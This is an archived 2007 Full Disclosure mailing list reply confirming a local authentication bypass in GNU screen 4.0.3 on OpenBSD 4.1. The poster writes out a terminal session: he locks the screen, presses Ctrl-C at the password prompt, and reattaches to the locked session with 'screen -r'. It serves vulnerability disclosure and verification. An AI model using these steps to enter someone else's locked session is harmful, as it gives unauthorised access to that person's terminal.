Full Disclosure mailing list archives
Re: screen 4.0.3 local Authentication Bypass
From: "Paul Melson" <pmelson () gmail com>
Date: Tue, 5 Jun 2007 11:14:10 -0400
-----Original Message----- Subject: Re: [Full-disclosure] screen 4.0.3 local Authentication Bypass
Verified on OpenBSD
I'm not seeing a 'Getpass error' message on 4.1-STABLE current, but there does seem to be a problem with locking and reattaching: $ screen [space] $ echo "This is the locked screen" This is the locked screen [^A^X] Key: [asdf\r] Again: [asdf\r] Screen used by Paul <paul>. Password: [^C] $ [\r] $ screen -r $ echo "This is the locked screen" This is the locked screen $ exit [screen is terminating] $ uname -rmsv OpenBSD 4.1 GENERIC.MP#0 i386 PaulM _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- screen 4.0.3 local Authentication Bypass rembrandt (Jun 03)
- Full Path Disclosure eqDKP 1.3.2c and prior kefka (Jun 03)
- Re: screen 4.0.3 local Authentication Bypass Alexander Klink (Jun 04)
- Re: screen 4.0.3 local Authentication Bypass Christian "Khark" Lauf (Jun 04)
- Re: screen 4.0.3 local Authentication Bypass Schanulleke (Jun 04)
- Re: screen 4.0.3 local Authentication Bypass Lolek of TK53 (Jun 05)
- Re: screen 4.0.3 local Authentication Bypass Christian "Khark" Lauf (Jun 04)
- Re: screen 4.0.3 local Authentication Bypass Lolek of TK53 (Jun 04)
- Re: screen 4.0.3 local Authentication Bypass Pranay Kanwar (Jun 04)
- Re: screen 4.0.3 local Authentication Bypass Sûnnet Beskerming (Jun 04)
- Re: screen 4.0.3 local Authentication Bypass Paul Melson (Jun 05)
- Re: screen 4.0.3 local Authentication Bypass Pranay Kanwar (Jun 04)
- Re: screen 4.0.3 local Authentication Bypass Sûnnet Beskerming (Jun 04)
- Re: screen 4.0.3 local Authentication Bypass Open Phugu (Jun 04)
- Re: screen 4.0.3 local Authentication Bypass Oliver Starke (Jun 05)
- Re: screen 4.0.3 local Authentication Bypass Frank Thyes (Jun 05)